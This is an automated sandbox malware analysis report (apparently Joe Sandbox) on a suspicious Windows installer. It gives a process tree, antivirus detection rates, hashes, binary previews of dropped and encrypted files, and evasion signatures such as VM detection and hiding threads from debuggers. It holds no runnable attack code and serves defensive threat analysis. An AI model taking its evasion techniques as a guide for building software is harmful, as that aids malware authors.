other processes 33->53 signatures7 process8 file9 84 C:\...\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, PE32 35->84 dropped 55 #U5b89#U88c5#U52a9#U624b2.0.3.tmp 4 16 35->55         started        106 Loading BitLocker PowerShell Module 38->106 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        63 sc.exe 41->63         started        signatures10 process11 file12 86 C:\Users\user\AppData\Local\...\update.vac, PE32 55->86 dropped 88 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->88 dropped 90 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->90 dropped 92 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->92 dropped 108 Query firmware table information (likely to detect VMs) 55->108 110 Protects its processes via BreakOnTermination flag 55->110 112 Hides threads from debuggers 55->112 114 Contains functionality to hide a thread from the debugger 55->114 65 7zr.exe 2 55->65         started        68 7zr.exe 7 55->68         started        70 cmd.exe 55->70         started        72 conhost.exe 63->72         started        signatures13 process14 file15 78 C:\Program Files (x86)\...\tProtect.dll, PE32+ 65->78 dropped 74 conhost.exe 65->74         started        76 conhost.exe 68->76         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b2.0.3.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc24%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac24%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac24%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b2.0.3.exefalse
    		high
    https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drfalse
      		high
      https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580391
        Start date and time:2024-12-24 13:10:37 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 10m 37s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:108
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U52a9#U624b2.0.3.exe
        renamed because original name is a hash value
        Original Sample Name:2.0.3.exe
        Detection:MAL
        Classification:mal84.evad.winEXE@133/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 76%
        • Number of executed functions: 28
        • Number of non-executed functions: 77
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

        Warnings

        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.3.exe

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b2.0.6.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b2.0.7.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b2.0.4.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b2.0.5.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse
                      cVyexkZjrG.exeGet hashmaliciousUnknownBrowse
                        cVyexkZjrG.exeGet hashmaliciousUnknownBrowse

                          Created / dropped Files

                          C:\Program Files (x86)\Windows NT\7zr.exe

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                          • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\file.bin (copy)

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.99990648888762
                          Encrypted:true
                          SSDEEP:24576:6S/dQNKzV4tTimpkvIx+bSYfhQl17L075lY7SjPYLLRm5Ejypbemets9kl2kXKW9:6SFQN1xozfC/70DWKECiW9ZKlAvg
                          MD5:63172D15278B00589C32D8B0A2F876D9
                          SHA1:6677C180B516A02FA9CA8723F1AFFE4B2C75F24D
                          SHA-256:2B63CCE0AAEC9E0C7E47C840836AA8F085CDB28C557C406932756BD4F2D7356F
                          SHA-512:783E77E5130FBB3D17BFFCAE50839B50A8B2A1BB71474C801517A3C4CFDC16583FBFAF14DC8FFFB3158CF08E6F6A1FFCE37E24A390668092E2BA7FF3789E53F1
                          Malicious:false
                          Preview:.@S.....8...................I(....*..jU..m.s.............d...&\BH)X..w..T....s..b..-...........T.oBy......7.UGwO...,Q..^...^..T...d...`..ZS9G..C/...-(.;...:....<`...r-..B.E...|.-.h...Vp.].......xU......7.~....D..j.m..iN,L..K..U!...w.c.rS.........k.....u...C.....0.G...8.<e.x......5L..M.,}.a.kw....`...i.....AFt.dqY..*.8..ML..>.|..Z\7."X.S.X.k...wl.....d.....e.qp#....YO#.Uu.wC.................L7..$...5.H. \-I..md.............d............w...4-.....O.B.[.;.1.F"..T.My(.].L..5..~9r......;yK..u.....sa-....?.....M...r....N.b.u....2.E.Q.C.. .....5...GP...,.A...%;.f_<...D..Q.k.Y5.....k...0.1..L#...KB.....H....s...J..6.W.2..j...$..u>.L.(...P.....^.4.<...@..p...mra.J.h.....s...ep!.[Qv.K...3....~..Q.g.-=...".qA....k.i".G6.P..{..&1.*Xr..v..FF.O.mU.<@..a?.ELy.X.Y..._.(5.Y.?.....}g..\...a..........".#..q..2yC.....7....[...{.a..`.X7.T..e.|.....g_<b..Rr..x.0.....Ni.Kh......c...H........U|[.3.../a..2b!.....(..N....!...#1....nrD...lw.F..=.H..A.C.)..Z..c.3..Y...

                          C:\Program Files (x86)\Windows NT\hrsw.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\is-7U33H.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1676465
                          Entropy (8bit):7.9998930894979035
                          Encrypted:true
                          SSDEEP:24576:CgXC6MkmDNAh7Oh81cHWpSFrTRHzvGo9Tw9LvT0wizEvy1vbNtWwAmPC7pkW2A+v:CT6jmDygh8KWpSF9z9TwVL0w5y1Lb+4v
                          MD5:6ED5E5FC8671A4CF1FBC61D9434C67D8
                          SHA1:7BED7036264A0794C60D766B0B79860838917BF6
                          SHA-256:480A033FF4FCC9E64D48ED456E9162E05979F9ECF988CDF1DAB29E001F73D6B7
                          SHA-512:EB3BBD792491F152510492291784C8622D852C354487B5095F72DF94B89E68602E7CC9DCF7F03230EE8918D20E849BA7671F328BC924AB65FE7EFF44321289D4
                          Malicious:false
                          Preview:.8*...z....L.gG..Q@=...c...yj..ENkkT.2[.[e...n.[..0@.T..[.:Ru8....N~...{x.5".g.n...x.5`...x5.....;O...BCN......W.."...C}.i'.....u.j.b.m..J.kX2...91.t...kp.Ns...Ew.0S....'.e9\I..E.5;6UN..:...2.... ouL.y..M...S...mh........h.#;&.a.....=..7.......|#1.4~V;..|..E..{...Y..v......l6u*r..+.....y.HY.w..\[..4..~T.`..r......bh..".-..(......7M@...1.....zd%.9.7.....vMc.-.s`...*...D...M...U..".....3.4&.T..mU ..,.i1.L.z8wn...FQ@b@.P+....]x..v../..c........`.V...=...'.8.M._..Q~.5vj...^..J.o.9....C................k@...T..I..&.m..xh.......GV...81.X....~.X..%I6......Vy.....Q.l%~..]d..g]"...>.^..G.x.%....Q...Mu.B....E....-...4.3X.5.9%B.N.......R0f.W>.i.w.|.F....D...*s.y....4b...>.....R.D.Y.#H=..G..N).X7l.p.NV.......,.._m....nhub.-...5.3?....|.$..d...^.B..0Z.O..xUH.... .b..?.........b.M...R.<W`.K..9BR..4]X&.........>.!.~...Z.d;.2L..!aT.2.".4 .cd.,...G...ksQ.`.&................vu....z.|gSa.U...}.....:.c.....=..i.RE..I..ae.9.i.0d.._.......a.<.c.hS.pX..D.SD

                          C:\Program Files (x86)\Windows NT\is-SM8KP.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.99990648888762
                          Encrypted:true
                          SSDEEP:24576:6S/dQNKzV4tTimpkvIx+bSYfhQl17L075lY7SjPYLLRm5Ejypbemets9kl2kXKW9:6SFQN1xozfC/70DWKECiW9ZKlAvg
                          MD5:63172D15278B00589C32D8B0A2F876D9
                          SHA1:6677C180B516A02FA9CA8723F1AFFE4B2C75F24D
                          SHA-256:2B63CCE0AAEC9E0C7E47C840836AA8F085CDB28C557C406932756BD4F2D7356F
                          SHA-512:783E77E5130FBB3D17BFFCAE50839B50A8B2A1BB71474C801517A3C4CFDC16583FBFAF14DC8FFFB3158CF08E6F6A1FFCE37E24A390668092E2BA7FF3789E53F1
                          Malicious:false
                          Preview:.@S.....8...................I(....*..jU..m.s.............d...&\BH)X..w..T....s..b..-...........T.oBy......7.UGwO...,Q..^...^..T...d...`..ZS9G..C/...-(.;...:....<`...r-..B.E...|.-.h...Vp.].......xU......7.~....D..j.m..iN,L..K..U!...w.c.rS.........k.....u...C.....0.G...8.<e.x......5L..M.,}.a.kw....`...i.....AFt.dqY..*.8..ML..>.|..Z\7."X.S.X.k...wl.....d.....e.qp#....YO#.Uu.wC.................L7..$...5.H. \-I..md.............d............w...4-.....O.B.[.;.1.F"..T.My(.].L..5..~9r......;yK..u.....sa-....?.....M...r....N.b.u....2.E.Q.C.. .....5...GP...,.A...%;.f_<...D..Q.k.Y5.....k...0.1..L#...KB.....H....s...J..6.W.2..j...$..u>.L.(...P.....^.4.<...@..p...mra.J.h.....s...ep!.[Qv.K...3....~..Q.g.-=...".qA....k.i".G6.P..{..&1.*Xr..v..FF.O.mU.<@..a?.ELy.X.Y..._.(5.Y.?.....}g..\...a..........".#..q..2yC.....7....[...{.a..`.X7.T..e.|.....g_<b..Rr..x.0.....Ni.Kh......c...H........U|[.3.../a..2b!.....(..N....!...#1....nrD...lw.F..=.H..A.C.)..Z..c.3..Y...

                          C:\Program Files (x86)\Windows NT\locale.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996960035347929
                          Encrypted:true
                          SSDEEP:1536:gmPYJlF+BlcIqK3RGxMyUryoNSJ9aeXZaFSy7muve:gWYJlF+GggeSXQS+mP
                          MD5:65D2D8DCB0AFFCA8518F46F1E9CB2265
                          SHA1:658034B71E4B4DF1997C08D0B739FD079801511D
                          SHA-256:9FC3ECB634743C29AFA189E57A57B3DC324D653020965B83716AD4D7ED21DB93
                          SHA-512:1548B7FF05971103D0B737979C7FD43EA04BB9CDAFD09387424E4E7DA5D50A620378B1A71D5E04019E5A0D998A0E8BAD350B3335A5B2778417B19656167F2B52
                          Malicious:false
                          Preview:.@S.....(o^l ................V..T&..N5j}.......d.4...A...!....2...<O..X(.^...}.G..B..]4c.V........D.n......$t.3.+T.A.J'R....S.b..$..i.08.......Y^.7......#....|....@..\%..6.3.=H..l.5..o..G........4Q..?..7..>.v....cC....D..........[t........3....Qxn@.P...5...........=i!...D.u%.a.d.....3...1.....R.K.=..D.Q...E...w9....\..4...9.[..ym.4.w5..c...8N....."......{B=lkb'$N..2....Y.7tA..;J...B.I..B.b.?.......|G.!_.}y.c........EH].OhY..M.....y..R....:'......b.......tz?...M.&...Oc.'....~....N.9/...x....3...>,..$t......|.>.T. ..}.J....K.y.F..%...\l.X...l.(n.x...]..3........*=B....a....;....k...,L.v/.1.[-H.'....i..DL..)QD.....;..v${...,}LiR..|>*a.....~..rQ...5....V..@.%...^..kteIs.....W.4Y ..N.bV..B~{.............L6..W.....{.e.."....2..3N.5..K].~.<.N.M..........1.q\v7.).....,|.P..Z.).....Ic..X..|B.l' H.......A<j.]|%...7.W:P;..g~...7L./.A..S.9....Ka.P..P....y.aJ.-.g~......1.;$.....~..*&..ja..Io.[7@.&.u....qs..M$.m..el...j..$...o......'Ny..d..Hb.!..J...

                          C:\Program Files (x86)\Windows NT\locale.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996960035347929
                          Encrypted:true
                          SSDEEP:1536:/fWE4JV7mb19SJJDAuh0bTzhoDJ2zlf5mZ4SxjkAUeHK8LB:0JV7mB0v0wWzh3A4SxjkAl9t
                          MD5:A9A4C60ED1964B3AB9343EB527C63AF9
                          SHA1:D8A202D32E23778D0D82B3C26EBB226EDF18EDF6
                          SHA-256:6630BE633F99409954C8FD8A5A0823777726798662562A2C2060027CB9B4D697
                          SHA-512:1B00F48F123F596BB13FCDE6B1966B93DB49F95F23F8EFD35752A550967C0A3FBA64353A6927F310B8E7D808EFDE82220D3C1D62EDF345660AFA5146E7D06A37
                          Malicious:false
                          Preview:7z..'..............2.......P.>{........eO+./*w..T.FoV.u.@.C`U..?J~C..=...R.unj....^.O..e.;.M^.a..<.}.KF.$.9.....N......[.=.pY.r,.E..M2....._..u..I5s..%.A.pd.P....EV.."$.......N.U.....Lh..'/j.g..x....6..g..D.Yd..C2..@o^2}..B2.+..5J.6.41...1?_..O`.......+-f.mA.L.,.$6y.^9....~.......+.9.E'..Tm...-.M..q.'.D..l.....y.h..>.:.e[...$d.C..@..../..\...t...24.`..O.x................[.7.....W.'"6X.r.g9b.)B.S.VB..TkF..C.a..g..&.#<'7....;d...Q..6._....9..2R5LJ..........j...U....86.N.=G#....o.-&./..*.K..Lc(..Rb..s$...js.;..K7..Q...k.....Y....T.M...a...9...s....a.D....R.....!pV.`...Z...(9%...a?en......Oy$.4h....9..T.Os[......>...W.u.w..`.....t....[<...;3....r6..t\....P.........t.f......_.=d0.....C..&......w..3Ly.#,..Y....5.nRg]u....(]..uy...p.9.y>..D....K.`.y...W:,WE..<............J.}k...*n@.E.6.Q,..S...BW..w|{c.^d.......;...#...n....^....\......D..k..a.`..ve.}3....l.`..#....L.N..m....-To....J..p!..m..S.*..I~*A...,..M.x...v.h.4-.w!.xQe6....Tp.rS..^.Ca..T%

                          C:\Program Files (x86)\Windows NT\locale2.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                          C:\Program Files (x86)\Windows NT\locale2.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                          C:\Program Files (x86)\Windows NT\locale3.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                          C:\Program Files (x86)\Windows NT\locale3.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
